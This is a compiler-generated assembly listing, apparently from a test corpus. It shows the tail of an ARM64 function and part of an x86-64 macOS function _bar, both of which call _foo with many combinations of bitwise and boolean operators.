and w0, w8, w9
bl _foo
ldr w8, [sp, #4] ; 4-byte Folded Reload
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
and w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
orr w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
lsl w8, w8, w10
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
asr w8, w8, w10
and w0, w8, w9
bl _foo
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w8, [sp, #16]
add w8, w8, #2
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
subs w8, w8, w10
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w0, [sp, #12] ; 4-byte Folded Reload
str w8, [sp, #16]
bl _foo
ldr w0, [sp, #12] ; 4-byte Folded Reload
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
and w8, w8, w10
and w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
orr w8, w8, w10
and w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
lsl w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
asr w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
add w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
subs w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #16]
stur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w9, [x29, #-12]
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
orn w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
and w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
orr w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
lsl w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
asr w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #16]
add w8, w8, #2
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
subs w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
str w8, [sp, #16]
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #4] ; 4-byte Folded Reload
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
and w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #16]
orr w8, w8, w9
ldur w9, [x29, #-8]
subs w9, w9, #0
cset w9, eq
and w9, w9, #0x1
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
lsl w8, w8, w10
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
asr w8, w8, w10
orr w0, w8, w9
bl _foo
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w8, [sp, #16]
add w8, w8, #2
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
subs w8, w8, w10
orr w0, w8, w9
bl _foo
ldr w0, [sp, #8] ; 4-byte Folded Reload
str w0, [sp, #16]
bl _foo
ldr w0, [sp, #4] ; 4-byte Folded Reload
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
and w8, w8, w10
orr w0, w8, w9
bl _foo
ldr w8, [sp, #8] ; 4-byte Folded Reload
ldr w9, [sp, #12] ; 4-byte Folded Reload
ldr w10, [sp, #16]
orr w8, w8, w10
orr w0, w8, w9
bl _foo
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _bar ## -- Begin function bar
.p2align 4, 0x90
_bar: ## @bar
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl %edi, -8(%rbp)
movl %esi, -12(%rbp)
movl %edx, -16(%rbp)
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl -12(%rbp), %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
movl %eax, -24(%rbp) ## 4-byte Spill
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -12(%rbp)
movb %al, -17(%rbp) ## 1-byte Spill
je LBB0_2
## %bb.1:
cmpl $0, -16(%rbp)
setne %al
movb %al, -17(%rbp) ## 1-byte Spill
LBB0_2:
movl -24(%rbp), %edi ## 4-byte Reload
movb -17(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
movl %eax, -32(%rbp) ## 4-byte Spill
movb $1, %al
cmpl $0, -12(%rbp)
movb %al, -25(%rbp) ## 1-byte Spill
jne LBB0_4
## %bb.3:
cmpl $0, -16(%rbp)
setne %al
movb %al, -25(%rbp) ## 1-byte Spill
LBB0_4:
movl -32(%rbp), %edi ## 4-byte Reload
movb -25(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -12(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -8(%rbp), %eax
andl -12(%rbp), %eax
cmpl $0, %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl -12(%rbp), %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $2, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -16(%rbp)
setne %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $1, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl -8(%rbp), %eax
andl $2, %eax
cmpl $0, %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $2, %edi
callq _foo
xorl %edi, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
cmpl $0, -16(%rbp)
setne %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
xorl %edi, %edi
callq _foo
xorl %edi, %edi
callq _foo
movl $1, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl -12(%rbp), %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
movl %eax, -40(%rbp) ## 4-byte Spill
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -12(%rbp)
movb %al, -33(%rbp) ## 1-byte Spill
je LBB0_6
## %bb.5:
cmpl $0, -16(%rbp)
setne %al
movb %al, -33(%rbp) ## 1-byte Spill
LBB0_6:
movl -40(%rbp), %edi ## 4-byte Reload
movb -33(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
movl %eax, -48(%rbp) ## 4-byte Spill
movb $1, %al
cmpl $0, -12(%rbp)
movb %al, -41(%rbp) ## 1-byte Spill
jne LBB0_8
## %bb.7:
cmpl $0, -16(%rbp)
setne %al
movb %al, -41(%rbp) ## 1-byte Spill
LBB0_8:
movl -48(%rbp), %edi ## 4-byte Reload
movb -41(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -12(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -8(%rbp), %eax
orl -12(%rbp), %eax
cmpl $0, %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl -12(%rbp), %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $2, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
movl $2, %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -16(%rbp)
setne %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $1, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl -8(%rbp), %eax
orl $2, %eax
cmpl $0, %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $2, %edi
callq _foo
movl $2, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
cmpl $0, -16(%rbp)
setne %al
andb $1, %al
movzbl %al, %edi
orl $0, %edi
callq _foo
movl $1, %edi
callq _foo
xorl %edi, %edi
callq _foo
xorl %edi, %edi
callq _foo
movl $2, %edi
callq _foo
movl -12(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -12(%rbp)
movb %al, -49(%rbp) ## 1-byte Spill
je LBB0_10
## %bb.9:
cmpl $0, -16(%rbp)
setne %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB0_10:
movb -49(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movb $1, %al
cmpl $0, -12(%rbp)
movb %al, -50(%rbp) ## 1-byte Spill
jne LBB0_12
## %bb.11:
cmpl $0, -16(%rbp)
setne %al
movb %al, -50(%rbp) ## 1-byte Spill
LBB0_12:
movb -50(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -12(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl -12(%rbp), %eax
andl -8(%rbp), %eax
cmpl $0, %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
callq _foo
movl -12(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $2, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -16(%rbp)
setne %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
andl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $1, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl -8(%rbp), %eax
andl $2, %eax
cmpl $0, %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
andl $2, %edi
callq _foo
xorl %edi, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
cmpl $0, -16(%rbp)
setne %al
andb $1, %al
movzbl %al, %edi
andl $0, %edi
callq _foo
xorl %edi, %edi
callq _foo
xorl %edi, %edi
callq _foo
movl $1, %edi
callq _foo
movl -12(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setg %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setne %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setle %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
setge %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -12(%rbp)
movb %al, -51(%rbp) ## 1-byte Spill
je LBB0_14
## %bb.13:
cmpl $0, -16(%rbp)
setne %al
movb %al, -51(%rbp) ## 1-byte Spill
LBB0_14:
movb -51(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movb $1, %al
cmpl $0, -12(%rbp)
movb %al, -52(%rbp) ## 1-byte Spill
jne LBB0_16
## %bb.15:
cmpl $0, -16(%rbp)
setne %al
movb %al, -52(%rbp) ## 1-byte Spill
LBB0_16:
movb -52(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -12(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
movl -12(%rbp), %eax
orl -8(%rbp), %eax
cmpl $0, %eax
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
callq _foo
movl -12(%rbp), %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %edi
orl $2, %edi
callq _foo
movl $2, %eax
cmpl -16(%rbp), %eax
setl %al
andb $1, %al
movzbl %al, %edi
cmpl $0, -8(%rbp)
setne %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
orl %eax, %edi
callq _foo
